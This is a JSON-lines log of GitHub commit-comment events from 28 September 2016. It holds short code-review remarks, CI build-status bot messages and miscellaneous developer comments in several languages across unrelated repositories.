{"id":"4628334673","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201815,"position":23,"line":23,"path":"14.cpp","commit_id":"44f29dfd2d55cd304742e8c7e8170017c5c12f1e","created_at":"2016-09-28T03:44:09Z","updated_at":"2016-09-28T03:44:09Z","body":"можете найти в cplusplus.com \r\nстандартный метод бинарного поиска ыtd::binary_search() и написать стресс-тест для вашего решения?"}},"created_at":"2016-09-28T03:44:09Z"}
{"id":"4628337898","type":"CommitCommentEvent","actor":{"login":"exneval"},"repo":{"name":"idathena/trunk"},"payload":{"comment":{"id":19201823,"position":null,"line":null,"path":null,"commit_id":"c9c9dda255120f9c1fbc1fe10973c7d848291c07","created_at":"2016-09-28T03:45:25Z","updated_at":"2016-09-28T03:45:25Z","body":"thank you."}},"created_at":"2016-09-28T03:45:25Z"}
{"id":"4628344987","type":"CommitCommentEvent","actor":{"login":"jez"},"repo":{"name":"jez/vim-as-an-ide"},"payload":{"comment":{"id":19201837,"position":null,"line":null,"path":null,"commit_id":"dff7da32daeb87dc5aa8c6c279f07fb22fcbafed","created_at":"2016-09-28T03:48:18Z","updated_at":"2016-09-28T03:48:18Z","body":"You'll have to save your vimrc, then reopen Vim before they'll take effect."}},"created_at":"2016-09-28T03:48:18Z"}
{"id":"4628347416","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19201841,"position":null,"line":null,"path":null,"commit_id":"b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77","created_at":"2016-09-28T03:49:22Z","updated_at":"2016-09-28T03:49:22Z","body":"update_standards_gem (asparke2) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2358 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.32%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T03:49:22Z"}
{"id":"4628348881","type":"CommitCommentEvent","actor":{"login":"YoshiteruIwasaki"},"repo":{"name":"aipocom/aipo"},"payload":{"comment":{"id":19201844,"position":null,"line":null,"path":null,"commit_id":"5ba56078a7b4d19848e29f7bf56adece6c692cdc","created_at":"2016-09-28T03:49:58Z","updated_at":"2016-09-28T03:49:58Z","body":"[![LGTM](https://lgtm.in/p/VQ62)](https://lgtm.in/i/VQ62)\r\n"}},"created_at":"2016-09-28T03:49:58Z"}
{"id":"4628356006","type":"CommitCommentEvent","actor":{"login":"PromoFaux"},"repo":{"name":"pi-hole/pi-hole"},"payload":{"comment":{"id":19201864,"position":14,"line":387,"path":"gravity.sh","commit_id":"b275100d89f32a209ea6c759d9497d856abc918c","created_at":"2016-09-28T03:52:48Z","updated_at":"2016-09-28T03:52:48Z","body":"Exactly. It needs to read in conf changes in the exception file."}},"created_at":"2016-09-28T03:52:48Z"}
{"id":"4628361250","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19201877,"position":null,"line":null,"path":null,"commit_id":"b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77","created_at":"2016-09-28T03:54:48Z","updated_at":"2016-09-28T03:54:48Z","body":"update_standards_gem (asparke2) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T03:54:48Z"}
{"id":"4628362518","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19201880,"position":null,"line":null,"path":null,"commit_id":"2042ee6458bd93f50e0e569ae109c53d06638f13","created_at":"2016-09-28T03:55:18Z","updated_at":"2016-09-28T03:55:18Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-28T03:55:18Z"}
{"id":"4628364040","type":"CommitCommentEvent","actor":{"login":"bezoerb"},"repo":{"name":"addyosmani/critical"},"payload":{"comment":{"id":19201883,"position":10,"line":314,"path":"README.md","commit_id":"d774fe5d481782e31376a37fc5cb9a5bb4ef907e","created_at":"2016-09-28T03:55:58Z","updated_at":"2016-09-28T03:55:58Z","body":"👍 "}},"created_at":"2016-09-28T03:55:58Z"}
{"id":"4628372964","type":"CommitCommentEvent","actor":{"login":"mxking"},"repo":{"name":"mxking/test"},"payload":{"comment":{"id":19201904,"position":null,"line":null,"path":null,"commit_id":"1e6712d3a1c0e906c4864496c4b88db05e1f468a","created_at":"2016-09-28T03:59:44Z","updated_at":"2016-09-28T03:59:44Z","body":"this is a new readme "}},"created_at":"2016-09-28T03:59:44Z"}
{"id":"4628375265","type":"CommitCommentEvent","actor":{"login":"amirahav"},"repo":{"name":"cloudamatic/mu"},"payload":{"comment":{"id":19201911,"position":null,"line":null,"path":null,"commit_id":"7654bf8920d8b71847bc7e06121097fdcddc4af6","created_at":"2016-09-28T04:00:31Z","updated_at":"2016-09-28T04:00:31Z","body":"https://github.com/cloudamatic/mu/commit/7654bf8920d8b71847bc7e06121097fdcddc4af6 fixes the DNS issue, so I don't think we have an issue with all threads getting killed..."}},"created_at":"2016-09-28T04:00:31Z"}
{"id":"4628380669","type":"CommitCommentEvent","actor":{"login":"HyagoMV"},"repo":{"name":"HyagoMV/JavaEstudo"},"payload":{"comment":{"id":19201924,"position":null,"line":null,"path":null,"commit_id":"82e54de8020f68a5333e0b975f0e4b0a38a04420","created_at":"2016-09-28T04:02:43Z","updated_at":"2016-09-28T04:02:43Z","body":"Primeiro comentario"}},"created_at":"2016-09-28T04:02:43Z"}
{"id":"4628383430","type":"CommitCommentEvent","actor":{"login":"dccurvers"},"repo":{"name":"dccurvers/hello-world"},"payload":{"comment":{"id":19201932,"position":null,"line":null,"path":null,"commit_id":"a19b2f238c5a39cb2ecf897f89555d18fd2b89b0","created_at":"2016-09-28T04:03:50Z","updated_at":"2016-09-28T04:03:50Z","body":"Nice work guys"}},"created_at":"2016-09-28T04:03:50Z"}
{"id":"4628384747","type":"CommitCommentEvent","actor":{"login":"mxking"},"repo":{"name":"mxking/test"},"payload":{"comment":{"id":19201935,"position":null,"line":null,"path":null,"commit_id":"1e6712d3a1c0e906c4864496c4b88db05e1f468a","created_at":"2016-09-28T04:04:23Z","updated_at":"2016-09-28T04:04:23Z","body":"isisisisiis"}},"created_at":"2016-09-28T04:04:23Z"}
{"id":"4628387226","type":"CommitCommentEvent","actor":{"login":"dingqz"},"repo":{"name":"dingqz/CISCO"},"payload":{"comment":{"id":19201938,"position":null,"line":null,"path":null,"commit_id":"3de65cdf11193055b81dc6c38c2d5fa7d0c46699","created_at":"2016-09-28T04:05:23Z","updated_at":"2016-09-28T04:05:23Z","body":"实验1 通过console口控制路由器和交换机\r\n\r\n反转线(rollover cable):一端采用568A或568B做线标准，另一端把568A或568B的顺序刚好从第一根到最后一根反过来。\r\n\r\n折叠编辑本段制作方法\r\n\r\n具体的线序制作方法是:以标准568B来说，\r\n\r\n其中一边的顺序 1、白橙 2、橙 3、白绿 4、蓝 5、白蓝 6、绿 7、白棕 8、棕;\r\n\r\n另一边则是1、棕 2、白棕 3、绿 4、白蓝 5、蓝 6、白绿 7、橙 8、白橙。\r\n\r\n如果是标准568A同理。\r\n\r\n反转线虽然不是用来连接各种以太网部件的，但它可以用来实现从主机到路由器控制台串行通信(com)端口的连接。\r\n\r\n有一种简便做反转线的方法，就是比如一端用568B标准做好后，另一端也用正常的568B的标准来排列线序，只需在将线插入水晶头时翻转水晶头，反着插入线就可以了。\r\n\r\n那一端安在CONSOLE口，另一端安在什么位置呢?\r\n\r\n反转线的另一端不能直接与电脑的网口相连。因为网络设备的CONSOLE口是没有IP地址的，即使连接上也无法实现通信。如果需要连接电脑进行CONSOLE控制，需要将连接电脑这端用转接口转换成9针串口母头;而一些笔记本电脑上是没有9针串口公头的，那样就需要再将9针串口母头用串口转USB口的转接头，转接为USB口，即调试设备是提示的COM口。"}},"created_at":"2016-09-28T04:05:23Z"}
{"id":"4628388896","type":"CommitCommentEvent","actor":{"login":"govint"},"repo":{"name":"vmware/docker-volume-vsphere"},"payload":{"comment":{"id":19201941,"position":null,"line":null,"path":null,"commit_id":"ff1e9d515110c100b18dc3edc42469dad83cc310","created_at":"2016-09-28T04:06:05Z","updated_at":"2016-09-28T04:06:05Z","body":"Suggest a test with a lot of requests in parallel to the plugin server. There doesn't seem to be an upper limit on the threads started and if for some reason those start getting stuck then we need a way to preempt those.\r\n\r\na) preempt those threads (keep track of threads) that don't seem to have completed (how?), we don't want a thread holding a lock and stuck and the volume is unusable, nor do we want to run out of VMCI connections, accepting new requests and those threads are stuck,\r\nb) keep a  nominal upper limit on the threads perhaps,\r\nc) add a command to admin CLI to list outstanding requests (threads) - debuggability for the server.\r\n"}},"created_at":"2016-09-28T04:06:05Z"}
{"id":"4628390465","type":"CommitCommentEvent","actor":{"login":"cassiofariasmachado"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19201944,"position":26,"line":48,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"1e110d9de2e85634a005b7c92a03e626603c52f4","created_at":"2016-09-28T04:06:43Z","updated_at":"2016-09-28T04:06:43Z","body":"Ok, corrigido."}},"created_at":"2016-09-28T04:06:43Z"}
{"id":"4628391067","type":"CommitCommentEvent","actor":{"login":"taukausanake"},"repo":{"name":"addictgamer/Terrastation-13"},"payload":{"comment":{"id":19201946,"position":null,"line":null,"path":null,"commit_id":"c16b2d788aa8a34eae2bb36bf4705ca37fb81135","created_at":"2016-09-28T04:06:58Z","updated_at":"2016-09-28T04:06:58Z","body":"Wait, why are we commiting the .dmb? That should be left out and compiled by the person who downloads the repo. It's their way of seeing that the code works by being able to compile it. Or putting an executable in source code"}},"created_at":"2016-09-28T04:06:58Z"}
{"id":"4628391653","type":"CommitCommentEvent","actor":{"login":"henrikra"},"repo":{"name":"Areii1/matrix_calculator"},"payload":{"comment":{"id":19201948,"position":null,"line":null,"path":null,"commit_id":"edcd098ae3a2ba8fe4b2c14b3a87e2cb4215b5bb","created_at":"2016-09-28T04:07:12Z","updated_at":"2016-09-28T04:07:12Z","body":"Laskin tulossa?"}},"created_at":"2016-09-28T04:07:12Z"}
{"id":"4628395611","type":"CommitCommentEvent","actor":{"login":"mxking"},"repo":{"name":"mxking/test"},"payload":{"comment":{"id":19201954,"position":1,"line":1,"path":"README.md","commit_id":"1e6712d3a1c0e906c4864496c4b88db05e1f468a","created_at":"2016-09-28T04:08:49Z","updated_at":"2016-09-28T04:08:49Z","body":"111"}},"created_at":"2016-09-28T04:08:49Z"}
{"id":"4628395662","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19201955,"position":null,"line":null,"path":null,"commit_id":"3d836cf18afd59ed33daca5add7f627999431e2d","created_at":"2016-09-28T04:08:50Z","updated_at":"2016-09-28T04:08:50Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#eW9-v5XFT7Gbv7rPmk3fWw"}},"created_at":"2016-09-28T04:08:50Z"}
{"id":"4628395867","type":"CommitCommentEvent","actor":{"login":"TianranWang"},"repo":{"name":"caolan/forms"},"payload":{"comment":{"id":19201957,"position":null,"line":null,"path":null,"commit_id":"10a9eac20d763d69cae4d2df8b776cb24366ff22","created_at":"2016-09-28T04:08:56Z","updated_at":"2016-09-28T04:08:56Z","body":"when using fields.time(), the result would be <type=\"text\"> instead of <type=\"date\">. This commit fix the issue."}},"created_at":"2016-09-28T04:08:56Z"}
{"id":"4628397465","type":"CommitCommentEvent","actor":{"login":"matthauck"},"repo":{"name":"OpenSC/libp11"},"payload":{"comment":{"id":19201959,"position":46,"line":351,"path":"src/p11_key.c","commit_id":"7573c6e800cae3b429ae018c6a6bcdfe61bc1b4b","created_at":"2016-09-28T04:09:38Z","updated_at":"2016-09-28T04:09:38Z","body":"Shouldn't this check `spriv->pin` to see if there is an explicit PIN set on the slot before failing? Maybe even using that pin *prior* to the ui_method PIN?"}},"created_at":"2016-09-28T04:09:38Z"}
{"id":"4628399891","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19201963,"position":null,"line":null,"path":null,"commit_id":"3d836cf18afd59ed33daca5add7f627999431e2d","created_at":"2016-09-28T04:10:35Z","updated_at":"2016-09-28T04:10:35Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cyqrDvtyQf25c99Q-VsrUw"}},"created_at":"2016-09-28T04:10:35Z"}
{"id":"4628400399","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19201965,"position":null,"line":null,"path":null,"commit_id":"3d836cf18afd59ed33daca5add7f627999431e2d","created_at":"2016-09-28T04:10:47Z","updated_at":"2016-09-28T04:10:47Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Fq_HzaKkSliusSzuYLfIEA"}},"created_at":"2016-09-28T04:10:47Z"}
{"id":"4628401119","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19201966,"position":null,"line":null,"path":null,"commit_id":"6624183a2cf32a08b19987ced3a88e57419d4489","created_at":"2016-09-28T04:11:05Z","updated_at":"2016-09-28T04:11:05Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2307 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6624183a2cf32a08b19987ced3a88e57419d4489-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6624183a2cf32a08b19987ced3a88e57419d4489-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.39%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T04:11:05Z"}
{"id":"4628402376","type":"CommitCommentEvent","actor":{"login":"BX95"},"repo":{"name":"BX95/Resume"},"payload":{"comment":{"id":19201969,"position":null,"line":null,"path":null,"commit_id":"7502fd7db99fa6207bfa03f28ffab059d43c3d60","created_at":"2016-09-28T04:11:39Z","updated_at":"2016-09-28T04:11:39Z","body":"Pointing to the guide for forking."}},"created_at":"2016-09-28T04:11:39Z"}
{"id":"4628405783","type":"CommitCommentEvent","actor":{"login":"incubus"},"repo":{"name":"ondrejbartas/sidekiq-cron"},"payload":{"comment":{"id":19201979,"position":10,"line":61,"path":"lib/sidekiq/cron/job.rb","commit_id":"b0c22b4562375f86275c1476646380de4982de5a","created_at":"2016-09-28T04:13:08Z","updated_at":"2016-09-28T04:13:08Z","body":"Hi Junyulive! I've already sent a fix for this. I thought you have seen it, so I decided not to update this comment. Sorry for this."}},"created_at":"2016-09-28T04:13:08Z"}
{"id":"4628407897","type":"CommitCommentEvent","actor":{"login":"safwank"},"repo":{"name":"safwank/toniq"},"payload":{"comment":{"id":19201984,"position":null,"line":null,"path":null,"commit_id":"3f12381ad5766ab9dcc5af3198ac7cf4f37937fe","created_at":"2016-09-28T04:14:04Z","updated_at":"2016-09-28T04:14:04Z","body":"@joakimk Do you want me to submit a PR for this? I'm also open to refining the idea so it can be merged back to `master`.\r\n\r\nYou mentioned having to delay jobs for `x` amount of time. Maybe we can extend this concept to support delays. And come to think of it, suspending a job is just delaying it indefinitely. I'm thinking of something along these lines\r\n\r\n1. To enqueue a delayed job, call `Toniq.enqueue_to(args, worker, opts)` where `opts` can be `[delay_until: 1475029568014]` to delay it until a certain time (`1475029568014` is the milliseconds since the UNIX epoch) or `[delay_until: :infinity]` to delay it indefinitely.\r\n2. When `JobRunner` picks up a new job, it'll also look in the `suspended_jobs` queue to see if there's any job that's no longer delayed and move it to `incoming_jobs`.\r\n3. For jobs that are delayed indefinitely, we need to manually move them to `incoming_jobs` as usual.\r\n\r\nI believe delaying/suspending jobs is a common scenario and hope you're open to it. Otherwise, no biggie, I can keep using my fork :)."}},"created_at":"2016-09-28T04:14:04Z"}
{"id":"4628415557","type":"CommitCommentEvent","actor":{"login":"romjerome"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":19201994,"position":null,"line":null,"path":null,"commit_id":"8e5e836bf88cf48bfddfb1298c13e54aa7fa3317","created_at":"2016-09-28T04:17:27Z","updated_at":"2016-09-28T04:17:27Z","body":"Sorry, it seems I added some words in french when this file has been created.\r\nNeed to also fix '[gramps.1.in](https://github.com/gramps-project/gramps/blob/master/data/man/gramps.1.in)'."}},"created_at":"2016-09-28T04:17:27Z"}
{"id":"4628423182","type":"CommitCommentEvent","actor":{"login":"devdrops"},"repo":{"name":"devdrops/php-pre-commit"},"payload":{"comment":{"id":19202007,"position":null,"line":null,"path":null,"commit_id":"bdcadbe5f95c8f3eef5b8ab6d13a3328a02ca2f1","created_at":"2016-09-28T04:20:49Z","updated_at":"2016-09-28T04:20:49Z","body":"The best approach would be to avoid icons coming from font types, as these fonts may not be installed by default for all terminal apps."}},"created_at":"2016-09-28T04:20:49Z"}
{"id":"4628425181","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19202009,"position":null,"line":null,"path":null,"commit_id":"4bdb65ae0099de3832638a5ab42f9798e6bb247c","created_at":"2016-09-28T04:21:41Z","updated_at":"2016-09-28T04:21:41Z","body":"This task isn't started by Grizzly Adams."}},"created_at":"2016-09-28T04:21:41Z"}
{"id":"4628426300","type":"CommitCommentEvent","actor":{"login":"iffyuva"},"repo":{"name":"code-mancers/picks"},"payload":{"comment":{"id":19202012,"position":6,"line":6,"path":"2016-09-28.md","commit_id":"b42b5006612f4b09cc369bf5f1849a14861b9e91","created_at":"2016-09-28T04:22:08Z","updated_at":"2016-09-28T04:22:08Z","body":"its frequently used by beginners also :D "}},"created_at":"2016-09-28T04:22:08Z"}
{"id":"4628432460","type":"CommitCommentEvent","actor":{"login":"vanmh"},"repo":{"name":"kiva/vertex"},"payload":{"comment":{"id":19202022,"position":24,"line":34,"path":"src/php/Admin/KivaDbTableMapperCommand.php","commit_id":"eb2c3262669579e8e780b05ee7ed130b519c2368","created_at":"2016-09-28T04:24:29Z","updated_at":"2016-09-28T04:24:29Z","body":"Now we're explicitly passing an argument here rather than relying on an implicit environment variable."}},"created_at":"2016-09-28T04:24:29Z"}
{"id":"4628433566","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19202024,"position":null,"line":null,"path":null,"commit_id":"6f9687221220804678df8fb124ce3ff22815fc11","created_at":"2016-09-28T04:24:57Z","updated_at":"2016-09-28T04:24:57Z","body":"MakeWebKitWork (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f9687221220804678df8fb124ce3ff22815fc11-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f9687221220804678df8fb124ce3ff22815fc11-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T04:24:57Z"}
{"id":"4628437253","type":"CommitCommentEvent","actor":{"login":"MingcongBai"},"repo":{"name":"AOSC-Dev/aosc-os-abbs"},"payload":{"comment":{"id":19202029,"position":null,"line":null,"path":null,"commit_id":"42449d17e8225ee3a7d4f7a3df6da9d201b6cbfc","created_at":"2016-09-28T04:26:29Z","updated_at":"2016-09-28T04:26:29Z","body":"And QUOTES wooooooooooooooooooooooo!"}},"created_at":"2016-09-28T04:26:29Z"}
{"id":"4628437786","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tsuuumi/twitter"},"payload":{"comment":{"id":19202032,"position":15,"line":15,"path":"app/controllers/tweets_controller.rb","commit_id":"0fbe50665984d90b2faffdb8fce156ffffc2bbce","created_at":"2016-09-28T04:26:43Z","updated_at":"2016-09-28T04:26:43Z","body":"不要なコメントは削除しましょう！\r\nコーディング規約を遵守してください。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-28T04:26:43Z"}
{"id":"4628438237","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tsuuumi/twitter"},"payload":{"comment":{"id":19202033,"position":5,"line":5,"path":"app/views/tweets/index.html.erb","commit_id":"0fbe50665984d90b2faffdb8fce156ffffc2bbce","created_at":"2016-09-28T04:26:56Z","updated_at":"2016-09-28T04:26:56Z","body":"不要なコメントは削除です。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-28T04:26:56Z"}
{"id":"4628439533","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tsuuumi/twitter"},"payload":{"comment":{"id":19202037,"position":6,"line":6,"path":"config/routes.rb","commit_id":"0fbe50665984d90b2faffdb8fce156ffffc2bbce","created_at":"2016-09-28T04:27:31Z","updated_at":"2016-09-28T04:27:31Z","body":"デフォルトで描かれているコメントは消してください。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-28T04:27:31Z"}
{"id":"4628440102","type":"CommitCommentEvent","actor":{"login":"Qdrivecom"},"repo":{"name":"Qdrivecom/Test_2016.9.27"},"payload":{"comment":{"id":19202038,"position":null,"line":null,"path":null,"commit_id":"3f40b77f269635a9e8a5d12645fafa64abf0c20e","created_at":"2016-09-28T04:27:46Z","updated_at":"2016-09-28T04:27:46Z","body":"同意"}},"created_at":"2016-09-28T04:27:46Z"}
{"id":"4628440495","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tsuuumi/twitter"},"payload":{"comment":{"id":19202039,"position":57,"line":57,"path":"public/404.html","commit_id":"0fbe50665984d90b2faffdb8fce156ffffc2bbce","created_at":"2016-09-28T04:27:57Z","updated_at":"2016-09-28T04:27:57Z","body":"ん？？\r\nなぜCSSにHTMLが？？？"}},"created_at":"2016-09-28T04:27:57Z"}
{"id":"4628442012","type":"CommitCommentEvent","actor":{"login":"renju1234"},"repo":{"name":"renju1234/imad-2016-app"},"payload":{"comment":{"id":19202043,"position":null,"line":null,"path":null,"commit_id":"091b6b6df6ad0d2bd4ef1f44ce0fb94d9655c3b2","created_at":"2016-09-28T04:28:38Z","updated_at":"2016-09-28T04:28:38Z","body":"\r\n   <head>\r\n       <title>\r\n           Article one 1 am renju\r\n       </title>   \r\n   </head>\r\n   <body>\r\n       <div>\r\n           <a href=\"/\"a>home</a>\r\n       </div>\r\n       <hr/>\r\n       <h3>\r\n           Article-one\r\n       </h3>\r\n       <div>\r\n           Sept 2016\r\n       </div>\r\n       <div>\r\n        <p>\r\n            We Travancore Hydrotech, is one of the leading  company for supply and installation of PUBLIC HEALTH ENGINEERING in South India. Since inception in 1992, we are guided by our core values of integrity, excellence in work, which made entire satisfaction to our clients. A Team of dedicated Engineers, Technocrats and Work force give our clients world class plumbing solutions. We cater the need of our clients with the best of the latest technology in water management and its utilization. Our completed projects spread across the country stands monuments to our consistent efforts. We have delivered consistently superior value to the building industry, especially major projects of hotels, hospitals, residential apartments, amusement park etc over the years. We are able to take up any large projects of any kind in PUBLIC HEALTH ENGINEERING. \r\n        </p>   \r\n        <p>\r\n            We also have proud to mention that during the span of our journey, there was     no disruption or stoppage of work of any kind due to lack of materials or men\r\n        </p>   \r\n        <p>\r\n            In 1992 Mr. KR Pradeep started Travancore Hydrotech as a partnership firm. His efforts and hard work made TRAVANCORE HYDROTECH as one of the leading companies for supply and installation of Public Health Engineering in India. The name itself has become synonymous with quality and commands lot of faith from the clients. The invaluable experience possessed by the members of the management enabled the establishment to become a well-structured professional organization with a fresh approach to the profession of plumbing\r\n        </p>    \r\n        <p>\r\n            One of the five star category premium resort located on the banks of Lake Vembanad at Vayalar, Alappuzha. The project having Heritage Villas, Floatting Cottages, Luxury House Boat, Delux Suites, Presidential Suites, Delux Rooms and Superior Rooms. The promoter of the project is Vasundhara Hotels & Resorts (P) Ltd.\r\n        </p>    \r\n      </div>\r\n   </body>\r\n</html>\r\n\r\n\r\n"}},"created_at":"2016-09-28T04:28:38Z"}
{"id":"4628443210","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tsuuumi/twitter"},"payload":{"comment":{"id":19202045,"position":null,"line":null,"path":null,"commit_id":"0fbe50665984d90b2faffdb8fce156ffffc2bbce","created_at":"2016-09-28T04:29:11Z","updated_at":"2016-09-28T04:29:11Z","body":"@tsuuumi コードレビューをしました！\r\nコーディング規約を守りながら実装を進めましょう。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html\r\n\r\nまた、コミットは、機能別に細かくするのが、一般的です。\r\nチーム開発をする際にはそうしますので、知っておいてください。"}},"created_at":"2016-09-28T04:29:11Z"}
{"id":"4628445001","type":"CommitCommentEvent","actor":{"login":"TeKnoSora"},"repo":{"name":"TeKnoSora/xiliBotMon"},"payload":{"comment":{"id":19202046,"position":1,"line":1,"path":"css/normalize.css","commit_id":"344c4aecbbb0ca49a143b86c0806bddc55c3a1d5","created_at":"2016-09-28T04:30:00Z","updated_at":"2016-09-28T04:30:00Z","body":"vbn"}},"created_at":"2016-09-28T04:30:00Z"}
{"id":"4628447024","type":"CommitCommentEvent","actor":{"login":"shipswhistle"},"repo":{"name":"shipswhistle/hello-world"},"payload":{"comment":{"id":19202047,"position":1,"line":1,"path":"README.md","commit_id":"af8686318457e6093b667a9b628f08ae0b8b1bc4","created_at":"2016-09-28T04:30:49Z","updated_at":"2016-09-28T04:30:49Z","body":"once upon a time there was a "}},"created_at":"2016-09-28T04:30:49Z"}
{"id":"4628449685","type":"CommitCommentEvent","actor":{"login":"tsmilan"},"repo":{"name":"a5c3nd3d/SWE20001-Battleships"},"payload":{"comment":{"id":19202052,"position":null,"line":null,"path":null,"commit_id":"67ba2691a2a6e06d9fa9b9222c63d8b911377ed7","created_at":"2016-09-28T04:32:00Z","updated_at":"2016-09-28T04:32:00Z","body":"Fixes #9 "}},"created_at":"2016-09-28T04:32:00Z"}
{"id":"4628452885","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/rogue-test"},"payload":{"comment":{"id":19202057,"position":null,"line":null,"path":null,"commit_id":"a7044af57f2beb7cc8f97c81d3fb9eb94d129f79","created_at":"2016-09-28T04:33:27Z","updated_at":"2016-09-28T04:33:27Z","body":"Actually, the header file that was changed was only changed as a result of removing a deprecated function and its declaration. Forgot to put that in the commit details."}},"created_at":"2016-09-28T04:33:27Z"}
{"id":"4628460855","type":"CommitCommentEvent","actor":{"login":"kevinkorte"},"repo":{"name":"kevinkorte/redrhino"},"payload":{"comment":{"id":19202110,"position":null,"line":null,"path":null,"commit_id":"395f03b9e64c542fa6697cd3020c98e86648a6ec","created_at":"2016-09-28T04:37:11Z","updated_at":"2016-09-28T04:37:11Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Save stripe subscription details in local database](https://trello.com/c/Q3B7626T/30-save-stripe-subscription-details-in-local-database)"}},"created_at":"2016-09-28T04:37:11Z"}
{"id":"4628461906","type":"CommitCommentEvent","actor":{"login":"tiberio40"},"repo":{"name":"tiberio40/Asignacion-Salones"},"payload":{"comment":{"id":19202116,"position":null,"line":null,"path":null,"commit_id":"c1e705f76735ff9affa39f1bd29bafcfc38bc0ce","created_at":"2016-09-28T04:37:37Z","updated_at":"2016-09-28T04:37:37Z","body":":O"}},"created_at":"2016-09-28T04:37:37Z"}
{"id":"4628462196","type":"CommitCommentEvent","actor":{"login":"fabiomcosta"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":19202118,"position":null,"line":null,"path":null,"commit_id":"59ff7749eda0cd858d5ee568315bcba1be75a1ca","created_at":"2016-09-28T04:37:45Z","updated_at":"2016-09-28T04:37:45Z","body":"very cool!"}},"created_at":"2016-09-28T04:37:45Z"}
{"id":"4628462960","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"atumanian/Stockfish"},"payload":{"comment":{"id":19202120,"position":null,"line":null,"path":null,"commit_id":"4a8b7be42caa13af8e50937cbdd96a1c4738de76","created_at":"2016-09-28T04:38:08Z","updated_at":"2016-09-28T04:38:08Z","body":"The base and test branch should be same for spsa tests"}},"created_at":"2016-09-28T04:38:08Z"}
